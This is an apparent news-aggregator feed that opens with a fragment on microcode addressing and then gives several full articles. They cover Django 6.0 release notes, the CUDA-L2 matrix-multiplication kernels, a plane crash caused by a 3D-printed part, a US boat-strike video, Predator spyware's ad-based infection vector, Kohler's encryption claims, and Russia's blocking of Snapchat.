The microcode address is composed of two fields: the upper 9 bits AR and the lower 4 bits CR . In the viewer, the opcode/address field is shown as AR.CR[3:2] (binary). When the opcode is empty, the next micro-instruction follows sequentially. For short jumps (type 0 actions), AR remains unchanged and a 4-bit target is loaded into CR ; hovering the short-jump value highlights the target row. For long jumps (types 5 and 7), a separate Translation ROM maps a 4-bit destination code to a full 13-bit address, and both AR and CR are replaced with this translated value.

What is better: a lookup table or an enum type?

Lobsters
www.cybertec-postgresql.com
2025-12-04 21:12:03
Comments...

Django 6 Released

Hacker News
docs.djangoproject.com
2025-12-04 21:09:56
Comments...
Original Article

December 3, 2025

Welcome to Django 6.0!

These release notes cover the new features , as well as some backwards incompatible changes you should be aware of when upgrading from Django 5.2 or earlier. We’ve begun the deprecation process for some features .

See the How to upgrade Django to a newer version guide if you’re updating an existing project.

Python compatibility

Django 6.0 supports Python 3.12, 3.13, and 3.14. We highly recommend , and only officially support, the latest release of each series.

The Django 5.2.x series is the last to support Python 3.10 and 3.11.

Third-party library support for older versions of Django

Following the release of Django 6.0, we suggest that third-party app authors drop support for all versions of Django prior to 5.2. At that time, you should be able to run your package’s tests using python -Wd so that deprecation warnings appear. After making the deprecation warning fixes, your app should be compatible with Django 6.0.

What’s new in Django 6.0

Content Security Policy support

Built-in support for the Content Security Policy (CSP) standard is now available, making it easier to protect web applications against content injection attacks such as cross-site scripting (XSS). CSP allows declaring trusted sources of content by giving browsers strict rules about which scripts, styles, images, or other resources can be loaded.

CSP policies can now be enforced or monitored directly using built-in tools: headers are added via the ContentSecurityPolicyMiddleware , nonces are supported through the csp() context processor, and policies are configured using the SECURE_CSP and SECURE_CSP_REPORT_ONLY settings.

These settings accept Python dictionaries and support Django-provided constants for clarity and safety. For example:

from django.utils.csp import CSP

SECURE_CSP = {
    "default-src": [CSP.SELF],
    "script-src": [CSP.SELF, CSP.NONCE],
    "img-src": [CSP.SELF, "https:"],
}

The resulting Content-Security-Policy header would be set to:

default-src 'self'; script-src 'self' 'nonce-SECRET'; img-src 'self' https:

To get started, follow the CSP how-to guide . For in-depth guidance, see the CSP security overview and the reference docs , which include details about decorators to override or disable policies on a per-view basis.

Template Partials

The Django Template Language now supports template partials , making it easier to encapsulate and reuse small named fragments within a template file. The new tags {% partialdef %} and {% partial %} define a partial and render it, respectively.

Partials can also be referenced using the template_name#partial_name syntax with get_template() , render() , {% include %} , and other template-loading tools, enabling more modular and maintainable templates without needing to split components into separate files.

A migration guide is available if you’re updating from the django-template-partials third-party package.

Background Tasks

Django now includes a built-in Tasks framework for running code outside the HTTP request–response cycle. This enables offloading work, such as sending emails or processing data, to background workers.

The framework provides task definition, validation, queuing, and result handling. Django guarantees consistent behavior for creating and managing tasks, while the responsibility for running them continues to belong to external worker processes.

Tasks are defined using the task() decorator:

from django.core.mail import send_mail
from django.tasks import task


@task
def email_users(emails, subject, message):
    return send_mail(subject, message, None, emails)

Once defined, tasks can be enqueued through a configured backend:

email_users.enqueue(
    emails=["user@example.com"],
    subject="You have a message",
    message="Hello there!",
)

Backends are configured via the TASKS setting. The two built-in backends included in this release are primarily intended for development and testing.

Django handles task creation and queuing, but does not provide a worker mechanism to run tasks. Execution must be managed by external infrastructure, such as a separate process or service.

See Django’s Tasks framework for an overview and the Tasks reference for API details.

Adoption of Python’s modern email API

Email handling in Django now uses Python’s modern email API, introduced in Python 3.6. This API, centered around the email.message.EmailMessage class, offers a cleaner and Unicode-friendly interface for composing and sending emails. It replaces use of Python’s older legacy ( Compat32 ) API, which relied on lower-level MIME classes (from email.mime ) and required more manual handling of message structure and encoding.

Notably, the return type of the EmailMessage.message() method is now an instance of Python’s email.message.EmailMessage . This supports the same API as the previous SafeMIMEText and SafeMIMEMultipart return types, but is not an instance of those now-deprecated classes.

Minor features

django.contrib.admin

  • The Font Awesome Free icon set (version 6.7.2) is now used for the admin interface icons.

  • The new AdminSite.password_change_form attribute allows customizing the form used in the admin site password change view.

  • Message levels messages.DEBUG and messages.INFO now have distinct icons and CSS styling. Previously, both levels shared the same appearance as messages.SUCCESS . Given that ModelAdmin.message_user() uses messages.INFO by default, set the level to messages.SUCCESS to keep the previous icon and styling.

django.contrib.auth

  • The default iteration count for the PBKDF2 password hasher is increased from 1,000,000 to 1,200,000.

django.contrib.gis

django.contrib.postgres

django.contrib.staticfiles

  • ManifestStaticFilesStorage now ensures consistent path ordering in manifest files, making them more reproducible and reducing unnecessary diffs.

  • The collectstatic command now reports only a summary for skipped files (and for deleted files when using --clear ) at --verbosity 1. To see per-file details for either case, set --verbosity to 2 or higher.

Email

Internationalization

  • Added support and translations for the Haitian Creole language.

Management Commands

  • The startproject and startapp commands now create the custom target directory if it doesn’t exist.

  • Common utilities, such as django.conf.settings , are now automatically imported to the shell by default.

Migrations

  • Squashed migrations can now themselves be squashed before being transitioned to normal migrations.

  • Migrations now support serialization of zoneinfo.ZoneInfo instances.

  • Serialization of deconstructible objects now supports keyword arguments with names that are not valid Python identifiers.

Models

Pagination

Requests and Responses

  • Multiple Cookie headers are now supported for HTTP/2 requests when running with ASGI.

Templates

  • The new variable forloop.length is now available within a for loop.

  • The querystring template tag now consistently prefixes the returned query string with a ? , ensuring reliable link generation behavior.

  • The querystring template tag now accepts multiple positional arguments, which must be mappings, such as QueryDict or dict .

Tests

Backwards incompatible changes in 6.0

Database backend API

This section describes changes that may be needed in third-party database backends.

  • BaseDatabaseSchemaEditor and PostgreSQL backends no longer use CASCADE when dropping a column.

  • DatabaseOperations.return_insert_columns() and DatabaseOperations.fetch_returned_insert_rows() methods are renamed to returning_columns() and fetch_returned_rows() , respectively, to denote they can be used in the context of UPDATE RETURNING statements as well as INSERT RETURNING .

  • The DatabaseOperations.fetch_returned_insert_columns() method is removed and the fetch_returned_rows() method replacing fetch_returned_insert_rows() expects both a cursor and returning_params to be provided, just like fetch_returned_insert_columns() did.

  • If the database supports UPDATE RETURNING statements, backends can set DatabaseFeatures.can_return_rows_from_update=True .

Dropped support for MariaDB 10.5

Upstream support for MariaDB 10.5 ends in June 2025. Django 6.0 supports MariaDB 10.6 and higher.

Dropped support for Python < 3.12

Because Python 3.12 is now the minimum supported version for Django, any optional dependencies must also meet that requirement. The following versions of each library are the first to add or confirm compatibility with Python 3.12:

  • aiosmtpd 1.4.5

  • argon2-cffi 23.1.0

  • bcrypt 4.1.1

  • docutils 0.22

  • geoip2 4.8.0

  • Pillow 10.1.0

  • mysqlclient 2.2.1

  • numpy 1.26.0

  • PyYAML 6.0.2

  • psycopg 3.1.12

  • psycopg2 2.9.9

  • redis-py 5.1.0

  • selenium 4.23.0

  • sqlparse 0.5.0

  • tblib 3.0.0

Email

DEFAULT_AUTO_FIELD setting now defaults to BigAutoField

Since Django 3.2, when the DEFAULT_AUTO_FIELD setting was added, the default startproject template’s settings.py contained:

DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"

and the default startapp template’s AppConfig contained:

default_auto_field = "django.db.models.BigAutoField"

At that time, the default value of DEFAULT_AUTO_FIELD remained django.db.models.AutoField for backwards compatibility.

In Django 6.0, DEFAULT_AUTO_FIELD now defaults to django.db.models.BigAutoField and the aforementioned lines in the project and app templates are removed.

Most projects shouldn’t be affected, since Django 3.2 has raised the system check warning models.W042 for projects that don’t set DEFAULT_AUTO_FIELD .

If you haven’t dealt with this warning by now, add DEFAULT_AUTO_FIELD = 'django.db.models.AutoField' to your project’s settings, or default_auto_field = 'django.db.models.AutoField' to an app’s AppConfig , as needed.

Custom ORM expressions should return params as a tuple

Prior to Django 6.0, custom lookups and custom expressions implementing the as_sql() method (and its supporting methods process_lhs() and process_rhs() ) were allowed to return a sequence of params in either a list or a tuple. To address the interoperability problems that resulted, the second return element of the as_sql() method should now be a tuple:

def as_sql(self, compiler, connection) -> tuple[str, tuple]: ...

If your custom expressions support multiple versions of Django, you should adjust any pre-processing of parameters to be resilient against either tuples or lists. For instance, prefer unpacking like this:

params = (*lhs_params, *rhs_params)

Miscellaneous

  • The JSON serializer now writes a newline at the end of the output, even without the indent option set.

  • The minimum supported version of asgiref is increased from 3.8.1 to 3.9.1.

Features deprecated in 6.0

Positional arguments in django.core.mail APIs

django.core.mail APIs now require keyword arguments for less commonly used parameters. Using positional arguments for these now emits a deprecation warning and will raise a TypeError when the deprecation period ends:

Miscellaneous

  • BaseDatabaseCreation.create_test_db(serialize) is deprecated. Use serialize_db_to_string() instead.

  • The PostgreSQL StringAgg class is deprecated in favor of the generally available StringAgg class.

  • The PostgreSQL OrderableAggMixin is deprecated in favor of the order_by attribute now available on the Aggregate class.

  • The default protocol in urlize and urlizetrunc will change from HTTP to HTTPS in Django 7.0. Set the transitional setting URLIZE_ASSUME_HTTPS to True to opt into assuming HTTPS during the Django 6.x release cycle.

  • The URLIZE_ASSUME_HTTPS transitional setting is deprecated.

  • Setting ADMINS or MANAGERS to a list of (name, address) tuples is deprecated. Set to a list of email address strings instead. Django never used the name portion. To include a name, format the address string as '"Name" <address>' or use Python’s email.utils.formataddr() .

  • Support for the orphans argument being larger than or equal to the per_page argument of django.core.paginator.Paginator and django.core.paginator.AsyncPaginator is deprecated.

  • Using a percent sign in a column alias or annotation is deprecated.

  • Support for passing Python’s legacy email MIMEBase object to EmailMessage.attach() (or including one in the message’s attachments list) is deprecated. For complex attachments requiring additional headers or parameters, switch to the modern email API’s MIMEPart .

  • The django.core.mail.BadHeaderError exception is deprecated. Python’s modern email raises a ValueError for email headers containing prohibited characters.

  • The django.core.mail.SafeMIMEText and SafeMIMEMultipart classes are deprecated.

  • The undocumented django.core.mail.forbid_multi_line_headers() and django.core.mail.message.sanitize_address() functions are deprecated.

Features removed in 6.0

These features have reached the end of their deprecation cycle and are removed in Django 6.0.

See Features deprecated in 5.0 for details on these changes, including how to remove usage of these features.

  • Support for passing positional arguments to BaseConstraint is removed.

  • The DjangoDivFormRenderer and Jinja2DivFormRenderer transitional form renderers are removed.

  • BaseDatabaseOperations.field_cast_sql() is removed.

  • request is required in the signature of ModelAdmin.lookup_allowed() subclasses.

  • Support for calling format_html() without passing args or kwargs is removed.

  • The default scheme for forms.URLField has changed from "http" to "https" .

  • The FORMS_URLFIELD_ASSUME_HTTPS transitional setting is removed.

  • The django.db.models.sql.datastructures.Join no longer falls back to get_joining_columns() .

  • The get_joining_columns() method of ForeignObject and ForeignObjectRel is removed.

  • The ForeignObject.get_reverse_joining_columns() method is removed.

  • Support for cx_Oracle is removed.

  • The ChoicesMeta alias to django.db.models.enums.ChoicesType is removed.

  • The Prefetch.get_current_queryset() method is removed.

  • The get_prefetch_queryset() method of related managers and descriptors is removed.

  • get_prefetcher() and prefetch_related_objects() no longer fall back to get_prefetch_queryset() .

See Features deprecated in 5.1 for details on these changes, including how to remove usage of these features.

  • django.urls.register_converter() no longer allows overriding existing converters.

  • The ModelAdmin.log_deletion() and LogEntryManager.log_action() methods are removed.

  • The undocumented django.utils.itercompat.is_iterable() function and the django.utils.itercompat module are removed.

  • The django.contrib.gis.geoip2.GeoIP2.coords() method is removed.

  • The django.contrib.gis.geoip2.GeoIP2.open() method is removed.

  • Support for passing positional arguments to Model.save() and Model.asave() is removed.

  • The setter for django.contrib.gis.gdal.OGRGeometry.coord_dim is removed.

  • The check keyword argument of CheckConstraint is removed.

  • The get_cache_name() method of FieldCacheMixin is removed.

  • The OS_OPEN_FLAGS attribute of FileSystemStorage is removed.

CUDA-L2: Surpassing cuBLAS Performance for Matrix Multiplication Through RL

Hacker News
github.com
2025-12-04 21:04:29
Comments...
Original Article

CUDA-L2: Surpassing cuBLAS Performance for Matrix Multiplication through Reinforcement Learning

CUDA-L2: Surpassing cuBLAS Performance for Matrix Multiplication through Reinforcement Learning

🥳 Introduction

CUDA-L2 is a system that combines large language models (LLMs) and reinforcement learning (RL) to automatically optimize Half-precision General Matrix Multiply (HGEMM) CUDA kernels. CUDA-L2 systematically outperforms major matmul baselines to date, from the widely-used torch.matmul to state-of-the-art NVIDIA closed-source libraries (cuBLAS, cuBLASLt-heuristic, cuBLASLt-AutoTuning). Paper

Evaluation Results
Speedup of CUDA-L2 over torch.matmul, cuBLAS, cuBLASLt-heuristic, and cuBLASLt-AutoTuning across 1000 (M,N,K) configurations on A100.

Evaluation Results
Speedup comparison results across 1000 (M,N,K) configurations on A100.

🎉 What's New

  • [Dec 2, 2025] Released A100 optimized HGEMM kernels across 1,000 configurations.

🗒️ To-Do List

  • Release HGEMM with 32-bit accumulator (SM80_16x8x16_F16F16F16F32 and F32F16F16F32 officially) for A100. Current version only support 16-bit accumulator (SM80_16x8x16_F16F16F16F16).
  • Support denser matrix configurations (more configurations).
  • Extend to more GPUs (Ada Lovelace, Hopper, Blackwell).
  • Easy deployment for open-source LLMs.

FAQ

Q: Do A100 kernels apply to other machines like RTX 3090 or H100?

A: Ideally, kernels trained on A100 should only be used on A100 if you are targeting speedup. They might have speedup on other machines, but it's not guaranteed. We will progressively release kernels trained on different machines.

Q: What if I need matrix dimensions (M, N, K) not found in your configurations?

A: 1. You can find the nearest neighbor configuration (larger than yours) and pad with zeros. 2. Feel free to post your dimensions on GitHub issues. We are happy to release kernels for your configuration.

Installation & Setup

1. Prerequisites

  • Python : Ensure you have a working Python environment.
  • PyTorch : This project requires PyTorch version 2.6.0 or higher.

2. Clone CUTLASS

This project depends on NVIDIA CUTLASS. You must clone specific tag v4.2.1 into a directory named cutlass :

git clone -b v4.2.1 https://github.com/NVIDIA/cutlass.git cutlass

⚠️ Warning : Please ensure you download the correct CUTLASS version ( v4.2.1 ) and set the CUTLASS_DIR environment variable correctly. Incorrect CUTLASS setup may cause the project to fail silently or produce no results.

3. Environment Variables

Before building or running the project, you must configure the following environment variables:

  • CUTLASS_DIR : Points to the directory where you cloned CUTLASS.
  • TORCH_CUDA_ARCH_LIST : Specifies the target GPU architecture (e.g., "8.0" for NVIDIA Ampere / A100 / RTX 30 series).

Run the following commands:

export CUTLASS_DIR=/path/to/your/cutlass
export TORCH_CUDA_ARCH_LIST="8.0"

Usage

To run the evaluation, use the eval_one_file.sh script. Below is an example command for offline mode:

./eval_one_file.sh --mnk 64_4096_64 --warmup_seconds 5 --benchmark_seconds 10 --base_dir ./results --gpu_device_id 7 --mode offline

For server mode, you need to specify --target_qps :

./eval_one_file.sh --mnk 64_4096_64 --warmup_seconds 5 --benchmark_seconds 10 --base_dir ./results --gpu_device_id 7 --mode server --target_qps 100

Arguments Reference

Argument Description
--mnk Specifies the problem size (e.g., 64_4096_64 ).
--warmup_seconds Duration of warmup in seconds before timing.
--benchmark_seconds Duration of benchmarking in seconds.
--base_dir Directory to save the compile and output results.
--gpu_device_id The ID of the GPU to use (e.g., 7 ).
--mode Execution mode. Options are:
offline : Runs the evaluation in offline/batch processing mode.
server : Runs the evaluation in server mode (simulating request-based scenarios).
--target_qps Target Queries Per Second (QPS) for server mode. Required if mode is server .

✉️ Contact

If you have any questions, please open a GitHub issue or reach out to us at jiwei_li@deep-reinforce.com .

Plane crashed after 3D-printed part collapsed

Hacker News
www.bbc.com
2025-12-04 20:56:08
Comments...
Original Article

Maisie Lillywhite Gloucestershire

Air Accidents Investigation Branch A crashed light aeroplane on an airfield, surrounded by debris, with bright orange technical structures beside it. There is an emergency vehicle behind the plane and the nose is completely destroyed. It is a sunny day with a blue sky. Air Accidents Investigation Branch

The sole crew member sustained minor injuries in the crash, which destroyed the light aircraft

A plane crashed after a 3D-printed part softened and collapsed, causing its engine to lose power, a report has found.

The Cozy Mk IV light aircraft was destroyed after its plastic air induction elbow, bought at an air show in North America, collapsed.

The aircraft crashed into a landing aid system at Gloucestershire Airport in Staverton on 18 March at 13:04 GMT, after its engine lost power. The sole occupant was taken to hospital with minor injuries.

The Air Accidents Investigation Branch (AAIB) said in a report that the induction elbow was made of "inappropriate material" and safety actions will be taken in future regarding 3D printed parts.

AAIB Parts at the base of an aeroplane, including a large black part which looks to has partially melted, with white arrows pointing to it. AAIB

The part, which was 3D-printed, softened and collapsed

Following an "uneventful local flight", the AAIB report said the pilot advanced the throttle on the final approach to the runway, and realised the engine had suffered a complete loss of power.

"He managed to fly over a road and a line of bushes on the airfield boundary, but landed short and struck the instrument landing system before coming to rest at the side of the structure," the report read.

It was revealed the part had been installed during a modification to the fuel system and collapsed due to its 3D-printed plastic material softening when exposed to heat from the engine.

The Light Aircraft Association (LAA) said it now intends to take safety actions in response to the accident, including a "LAA Alert" regarding the use of 3D-printed parts that will be sent to inspectors.


Video of U.S. Military Killing Boat Strike Survivors Is Horrifying, Lawmakers Reveal

Intercept
theintercept.com
2025-12-04 20:52:04
“What I saw in that room is one of the most troubling scenes I’ve ever seen in my time in public service.” The post Video of U.S. Military Killing Boat Strike Survivors Is Horrifying, Lawmakers Reveal appeared first on The Intercept....
Original Article

Lawmakers who saw a video of a U.S. attack on wounded and helpless people clinging to the wreckage of a supposed drug boat on September 2 described the footage as deeply disturbing.

A small number of members of the House Permanent Select Committee on Intelligence and the Senate and House Armed Services committees, as well as some staff directors, saw the recording during closed-door briefings Thursday with Adm. Frank M. Bradley , the head of Special Operations Command, and Gen. Dan Caine, the chair of the Joint Chiefs of Staff.

“What I saw in that room is one of the most troubling scenes I’ve ever seen in my time in public service,” said Rep. Jim Himes of Connecticut, the top Democrat on the House Intelligence Committee. “You have two individuals in clear distress without any means of locomotion with a destroyed vessel who were killed by the United States.

Until Thursday, the only video of the attack that had been seen by lawmakers was an edited clip posted to the Truth Social account of President Donald Trump on September 2 announcing the strike. The edited clip captures the initial strike, showing a four-engine speedboat erupt in an explosion. It does not show the second strike on the wreckage of the vessel and the survivors — which was first reported by The Intercept .

Himes said the unedited video clearly shows the U.S. striking helpless people.

“Any American who sees the video that I saw will see the United States military attacking shipwrecked sailors.”

“Any American who sees the video that I saw will see the United States military attacking shipwrecked sailors — bad guys, bad guys, but attacking shipwrecked sailors,” he told The Intercept.

Himes said that Bradley — who conducted the follow-up strike as the then-commander of Joint Special Operations Command — “confirmed that there had not been a ‘kill them all’ order.” The Washington Post recently reported that Hegseth personally ordered the follow-up attack, giving a spoken order “to kill everybody.”

Sen. Jack Reed of Rhode Island, the top Democrat on the Armed Services Committee, also expressed dismay after watching the footage. “I am deeply disturbed by what I saw this morning. The Department of Defense has no choice but to release the complete, unedited footage of the September 2 strike, as the President has agreed to do,” he said on Thursday.

“This briefing confirmed my worst fears about the nature of the Trump Administration’s military activities, and demonstrates exactly why the Senate Armed Services Committee has repeatedly requested — and been denied — fundamental information, documents, and facts about this operation. This must and will be the only beginning of our investigation into this incident,” said Reed.

Trump has said he supports the release of the video showing the second boat strike that killed the remaining survivors of the initial September 2 attack . “I don’t know what they have, but whatever they have, we’d certainly release, no problem,” Trump told reporters in the Oval Office on Wednesday.

Brian Finucane, a former State Department lawyer who is a specialist in counterterrorism issues and the laws of war, told The Intercept that intense scrutiny needs to extend far beyond the first strike in the U.S. operation in the waters near Venezuela.

“Oversight needs to be broader than this one incident. It needs to cover the entire maritime bombing campaign. And it needs to go beyond the Department of Defense,” he told The Intercept. “We need to know how this policy was formulated in the first instance. What was the process by which some aspect of it got legal blessing from the Justice Department’s Office of Legal Counsel? That all needs to be drug out into the open.”

The military has carried out 21 known attacks, destroying 22 boats in the Caribbean Sea and eastern Pacific Ocean since September, killing at least 83 civilians . The most recent strike on a vessel was November 15.

Since the attacks began, experts in the laws of war and members of Congress, from both parties , have described the strikes as illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence. Throughout the long-running U.S. war on drugs , law enforcement agencies have arrested suspected drug smugglers rather than relying on summary executions. The double-tap strike first reported by The Intercept has only made worse a pattern of attacks that experts and lawmakers say are already tantamount to murder .

Sarah Harrison, who previously advised Pentagon policymakers on issues related to human rights and the law of war, cautioned against undue focus on the double-tap strike. “I can understand why the public and lawmakers are shocked by the second strike on Sept 2. The imagery of humans clinging to wreckage, likely severely injured, and then subsequently executed, is no doubt jarring. But we have to keep emphasizing to those who are conducting the strikes within DoD that there is no war, thus no law of war to protect them,” said Harrison, a former associate general counsel at the Pentagon’s Office of General Counsel, International Affairs. “All of the strikes, not just the Sept 2 incident, are extrajudicial killings of people alleged to have committed crimes. Americans should have been and should continue to be alarmed by that.”

The Pentagon continues to argue it is at war with undisclosed drug cartels and gangs. “I can tell you that every single person who we have hit thus far who is in a drug boat carrying narcotics to the United States is a narcoterrorist. Our intelligence has confirmed that, and we stand by it,” Pentagon press secretary Kingsley Wilson said Tuesday .

“There is no such thing as a narco-terrorist,” Himes said on Thursday. “Apparently, we have enough evidence to kill these people, but we don’t have enough evidence to try them in a court of law. People ought to sort of let that sink in and think about the implications of that.”

“Apparently, we have enough evidence to kill these people, but we don’t have enough evidence to try them in a court of law.”

Sources briefed about the video footage say it contradicts a narrative that emerged in recent days that intercepted communications between the survivors and their supposed colleagues demonstrated those wounded individuals clinging to the wreckage were combatants, rather than shipwrecked and defenseless people whom it would be a war crime to target.

The Pentagon’s Law of War Manual is clear on attacking defenseless people. “Persons who have been rendered unconscious or otherwise incapacitated by wounds, sickness, or shipwreck, such that they are no longer capable of fighting, are hors de combat,” reads the guide using the French term for those out of combat. “Persons who have been incapacitated by wounds, sickness, or shipwreck are in a helpless state, and it would be dishonorable and inhumane to make them the object of attack.”

“The notion that radioing for help forfeits your shipwreck status is absurd — much less than it enables them to target you,” said Finucane. “I don’t believe there’s an armed conflict, so none of these people are lawful targets. They weren’t combatants, they’re not participating in hostilities. So the whole construct is ridiculous. But even if you accept that this is some sort of law of war situation, radioing for help does not deprive you of shipwreck status or render you a target under the law of war.”

Predator spyware uses new infection vector for zero-click attacks

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 20:47:42
The Predator spyware from surveillance company Intellexa has been using a zero-click infection mechanism dubbed "Aladdin" that compromised specific targets when simply viewing a malicious advertisement. [...]...
Original Article

Predator spyware uses new infection vector for zero-click attacks

The Predator spyware from surveillance company Intellexa has been using a zero-click infection mechanism dubbed “Aladdin,” which compromised specific targets by simply viewing a malicious advertisement.

This powerful and previously unknown infection vector is meticulously hidden behind shell companies spread across multiple countries, now uncovered in a new joint investigation by Inside Story , Haaretz , and WAV Research Collective .

The investigation is based on 'Intellexa Leaks' - a collection of leaked internal company documents and marketing material, and is corroborated by technical research from forensic and security experts at Amnesty International, Google, and Recorded Future.

Leaked marketing material
Leaked Intellexa marketing material
Source: Amnesty International

Ad-based spyware delivery

First deployed in 2024 and believed to still be operational and actively developed, Aladdin leverages the commercial mobile advertising system to deliver malware.

The mechanism forces weaponized ads onto specific targets identified by their public IP address and other identifiers, instructing the platforms via the Demand Side Platform (DSP) to serve it on any website participating in the ad network.

“This malicious ad could be served on any website that displays ads, such as a trusted news website or mobile app, and would appear like any other ad that the target is likely to see,” explains Amnesty International’s Security Lab .

“Internal company materials explain that simply viewing the advertisement is enough to trigger the infection on the target’s device, without any need to click on the advertisement itself.”

Overview of Aladdin
Overview of Aladdin
Source: Amnesty International

Although no details are available on how the infection works, Google mentions that the ads trigger redirections to Intellexa’s exploit delivery servers.

The ads are funneled through a complex network of advertising firms spread across multiple countries, including Ireland, Germany, Switzerland, Greece, Cyprus, the UAE, and Hungary.

Recorded Future dug deeper into the advertising network, connecting the dots between key people, firms, and infrastructure, and naming some of those companies in its report .

Defending against those malicious ads is complex, but blocking ads on the browser would be a good starting point.

Another potential defense measure would be to set the browser to hide the public IP from trackers.

However, the leaked documents show that Intellexa can still obtain the information from domestic mobile operators in their client’s country.

Countries confirmed to host Predator activity
Countries confirmed to host Predator activity
Source: Recorded Future

Samsung Exynos and zero-day exploits

Another key finding in the leak is confirmation of the existence of another delivery vector called 'Triton', which can target devices with Samsung Exynos with baseband exploits, forcing 2G downgrades to lay the ground for infection.

Amnesty International’s analysts are unsure whether this vector is still used and note that there are two other, possibly similar delivery mechanisms, codenamed 'Thor' and 'Oberon', believed to involve radio communications or physical access attacks.

Google’s researchers name Intellexa as one of the most prolific commercial spyware vendors in terms of zero-day exploitation, responsible for 15 out of the 70 cases of zero-day exploitation TAG discovered and documented since 2021.

Google says Intellexa develops its own exploits and also purchases exploit chains from external entities to cover the full spectrum of required targeting.

Despite sanctions and ongoing investigations against Intellexa in Greece, the spyware operator is as active as ever, according to Amnesty International.

As Predator evolves into becoming stealthier and harder to trace, users are recommended to consider enabling extra protection on their mobile devices, like Advanced Protection on Android and Lockdown Mode on iOS.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Kohler's Smart Toilet Camera Not Actually End-to-End Encrypted

403 Media
www.404media.co
2025-12-04 20:47:37
Gives new meaning to the 'internet of shit.'...
Original Article

Home goods company Kohler would like a bold look in your toilet to take some photos. It’s OK, though, the company has promised that all the data it collects on your “waste” will be “end-to-end encrypted.” However, a deeper look into the company’s claim by technologist Simon Fondrie-Teitler revealed that Kohler seems to have no idea what E2EE actually means. According to Fondrie-Teitler’s write-up , which was first reported by TechCrunch , the company will have access to the photos the camera takes and may even use them to train AI.

The whole fiasco gives an entirely too on-the-nose meaning to the “Internet of Shit.”

Kohler launched its $600 camera to hang on your toilets earlier this year. It’s called Dekoda, and along with the large price tag, the toilet cam also requires a monthly service fee that starts at $6.99. If you want to track the piss and shit of a family of 6, you’ll have to pay $12.99 a month.

What do you get for putting a camera on your toilet? According to Kohler’s pitch , “health & wellness insights” about your gut health and “possible signs of blood in the bowl” as “Dekoda uses advanced sensors to passively analyze your waste in the background.”

If you’re squeamish about sending pictures of the “waste” of your family to Kohler, the company promised that all of the data is “end-to-end encrypted.” The privacy page for the Kohler Health said “user data is encrypted end to end, at rest and in transit” and it’s mentioned several places in the marketing.

It’s not, though. Fondrie-Teitler told 404 Media he started looking into Dekoda after he noticed friends making fun of it in a Slack he’s part of. “I saw the ‘end-to-end encryption’ claim on the homepage, which seemed at odds with what they said they were collecting in the privacy policy,” he said. “Pretty much every other company I've seen implement end-to-end encryption has published a whitepaper alongside it. Which makes sense, the details really matter so telling people what you've done is important to build trust. Plus it's generally a bunch of work so companies want to brag about it. I couldn't find any more details though.”

E2EE has a specific meaning . It’s a type of messaging system that keeps the contents of a message private while in transit, meaning only the person sending and the person receiving a message can view it. Famously, E2EE means that the messaging company itself cannot decode or see the messages (Signal, for example, is E2EE). The point is to protect the privacy of individual users from a company prying into data if a third party, like the government, comes asking for it.

Kohler, it’s clear, has access to a user’s data. This means it’s not E2EE. Fondrie-Teitler told 404 Media that he downloaded the Kohler health app and analyzed the network traffic it sent. “I didn't see anything that would indicate an end-to-end encrypted connection being created,” he said.

Then he reached out to Kohler and had a conversation with its privacy team via email. “The Kohler Health app itself does not share data between users. Data is only shared between the user and Kohler Health,” a member of the privacy team at Kohler told Fondrie-Teitler in an email reviewed by 404 Media. “User data is encrypted at rest, when it’s stored on the user's mobile phone, toilet attachment, and on our systems.  Data in transit is also encrypted end-to-end, as it travels between the user's devices and our systems, where it is decrypted and processed to provide our service.”

If Kohler can view the user’s data, as it admits to doing in this email exchange with Fondrie-Teitler, then it’s not—by definition—using E2EE. Kohler did not immediately respond to 404 Media’s request for comment.

“I'd like the term ‘end-to-end encryption’ to not get watered down to just meaning ‘uses https’ so I wanted to see if I could confirm what it was actually doing and let people know,” Fondrie-Teitler told 404 Media. He pointed out that Zoom once made a similar claim and had to pay a fine to the FTC because of it.

“I think everyone has a right to privacy, and in order for that to be realized people need to have an understanding of what's happening with their data,” Fondrie-Teitler said. “It's already so hard for non-technical individuals (and even tech experts) to evaluate the privacy and security of the software and devices they're using. E2EE doesn't guarantee privacy or security, but it's a non-trivial positive signal and losing that will only make it harder for people to maintain control over their data.”

About the author

Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.

Matthew Gault

Russia blocks Snapchat and restricts Apple’s FaceTime, state officials say

Guardian
www.theguardian.com
2025-12-04 20:46:07
Latest effort to control communications comes as regulator claims apps being used to ‘conduct terrorist activities’ Russian authorities blocked access to Snapchat and imposed restrictions on Apple’s video calling service, FaceTime, the latest step in an effort to tighten control over the internet an...
Original Article

Russian authorities blocked access to Snapchat and imposed restrictions on Apple’s video calling service, FaceTime, the latest step in an effort to tighten control over the internet and communications online, according to state-run news agencies and the country’s communications regulator.

The state internet regulator Roskomnadzor alleged in a statement that both apps were being “used to organize and conduct terrorist activities on the territory of the country, to recruit perpetrators [and] commit fraud and other crimes against our citizens”. Apple did not respond to an emailed request for comment, nor did Snap Inc.

The Russian regulator said it took action against Snapchat on 10 October, even though it only reported the move on Thursday. The moves follow restrictions against Google’s YouTube, Meta’s WhatsApp and Instagram, and the Telegram messaging service, itself founded by a Russian-born man, that came in the wake of Vladimir Putin’s invasion of Ukraine in 2022.

Under Vladimir Putin, authorities have engaged in deliberate and multi-pronged efforts to rein in the internet. They have adopted restrictive laws and banned websites and platforms that don’t comply. Technology has also been perfected to monitor and manipulate online traffic.

Access to YouTube was disrupted last year in what experts called deliberate throttling of the widely popular site by the authorities. The Kremlin blamed YouTube owner Google for not properly maintaining its hardware in Russia.

While it’s still possible to circumvent some of the restrictions by using virtual private network services, those are routinely blocked, too.

Authorities further restricted internet access this summer with widespread shutdowns of cellphone internet connections. Officials have insisted the measure was needed to thwart Ukrainian drone attacks, but experts argued it was another step to tighten internet control. In dozens of regions, “white lists” of government-approved sites and services that are supposed to function despite a shutdown have been introduced.

The government has also acted against popular messaging platforms. The encrypted messenger Signal and another popular app, Viber, were blocked in 2024. This year, authorities banned calls via WhatsApp, the most popular messaging app in Russia, and Telegram, a close second. Roskomnadzor justified the measure by saying the two apps were being used for criminal activities.

